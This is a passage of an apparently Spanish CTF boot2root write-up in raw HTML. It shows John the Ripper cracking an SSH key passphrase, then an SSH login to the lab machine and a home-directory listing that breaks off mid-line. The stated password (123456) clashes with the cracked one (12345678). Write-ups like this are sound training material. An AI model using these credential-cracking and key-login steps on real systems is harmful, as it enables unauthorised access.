font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root@</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">v4n:~/CTF/hc0n2020/boot2root</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># john id_rsa.hash </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Using default input encoding: UTF</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-8</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Loaded </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> password hash (SSH [RSA/DSA/EC/OPENSSH (SSH </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">private</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">keys</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">32</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">64</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">])</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Cost </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (KDF/cipher [</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">=MD5/AES </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">=MD5/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">DES </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">=Bcrypt/AES]) is </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> all loaded hashes</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Cost </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (iteration count) is </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> all loaded hashes</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">...</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Proceeding </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">with</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> wordlist:/usr/share/john/password.lst, rules:Wordlist</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12345678</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (id_rsa)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Proceeding </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">with</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> incremental:ASCII</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12345678</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (id_rsa)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">g </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">00</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">02</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">07</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0.01570</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">g/s </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1216</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Kp/s </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1216</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Kc/s </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1216</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">KC/s tumms31..tumml20</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Session aborted</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">------------------</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Pass </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12345678</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></p></td></tr></tbody></table></div><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">{0x4} Acceso</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accedemos a la máquina con </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">ssh -i id_rsa prequal@54.36.134.34</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> y la password 123456 con éxito. En el directorio </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/prequal/</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> y obtenemos la flag de user que está en el archivo </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">local.txt</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 265px; overflow: hidden; width: 691px;"><img height="265" src="https://lh5.googleusercontent.com/d4mlo7FafQdm93UhMGkWHkLy3p32v7CLCYQPfYhKtbebsAOdLnkE-_-7kaXBi92ROKsZtOzidnIXw2KsK3mXUP9BePM_PpBcfSzv6RbLlH6qwESRESg06JVflbqHb1ElRMNrQiOs" style="margin-left: 0px; margin-top: 0px;" width="691" /></span></span></p><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #333333; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal@h-c0n_prequal:~$ id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">uid=1001(prequal) gid=1001(prequal) groups=1001(prequal)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal@h-c0n_prequal:~$ pwd</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/prequal</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal@h-c0n_prequal:~$ ls -la</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">total 44</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwxr-xr-x</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 5 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 4096 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Jan</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 10 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">02:05 .</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwxr-xr-x</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 3 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root root </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 4096 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dec</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 19 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">04:41 ..</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-------</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 1 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 118 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Jan</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 10 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">02:05 .Xauthority</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-------</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 1 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 84 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Jan</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 10 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">01:42 .bash_history</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-r--r--</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 1 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 220 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dec</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 19 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">04:41 .bash_logout</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-r--r--</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 1 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 3526 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dec</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 19 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">04:41 .bashrc</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwxr-xr-x</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 2 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 4096 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dec</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 19 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">04:45 .nano</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-r--r--</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 1 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">prequal prequal </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 675 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dec</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 19 </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">04:41 .profile</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwx------</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> 2 </span><span style="color: white; font-family: 